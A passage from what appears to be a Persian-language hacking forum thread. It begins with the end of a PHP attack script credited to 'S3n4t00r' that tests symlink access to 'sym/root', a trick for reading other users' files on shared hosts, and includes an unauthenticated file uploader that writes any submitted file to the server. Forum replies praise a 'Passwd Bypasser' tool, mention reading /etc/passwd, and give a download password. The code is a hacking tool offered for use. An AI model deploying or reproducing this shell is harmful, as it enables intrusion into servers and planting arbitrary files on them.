echo "<tr><td>function mkdir</td><td>$r</td>";
 
 
$fun = is_dir('sym/root');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
 
echo "<tr><td>Permission denied</td><td>$r</td>";
 
 
$fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
     if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
 
echo "<tr><td>Forbidden</td><td>$r</td>";
 
 
 
 
echo "</table></div>";
 
 
 
break;
default:
header("Location: $pg");
 
 
 
 
}
 
 
/// home ///
}else
{
 
 
echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
    else { echo '<br /><br />Not uploaded !!<br><br>'; }
 
 
}
 
    echo '
<br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
<br /><br />
<b style="color: red";>   Sec-w.Com  </b>
<br /><br />
Muslims Hackers</div> ';
 
}
 
 
function ex($text,$a,$b){
$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}
 
 
 
echo '</div>
 
<a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>
 
<a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>
 
 
 
</body>
 
</html>
';
 
?>

**AL1R3Z4** · 08-14-2013, 12:19 AM

RE:فیلم اموزشی Passwd Bypasser

اینم یک مثال زنده از این بایپس (تو فیلم میبینید که با دستوره cat /etc/passwd یوزر ها فایند نمیشن بعد با او اسکریپت...)

لینک دانلود:

passwd bypass with script

پسورد:
[php]iranhack[/php]

**Remot3r** · 10-20-2013, 01:22 PM

RE: Passwd Bypasser

خیلی هم عالی یکـــــــــــــــــــــــــــــــه !

کد:

uid = user

اطلاعیه

Passwd Bypasser

Passwd Bypasser

نظر

نظر

نظر

نظر

نظر

نظر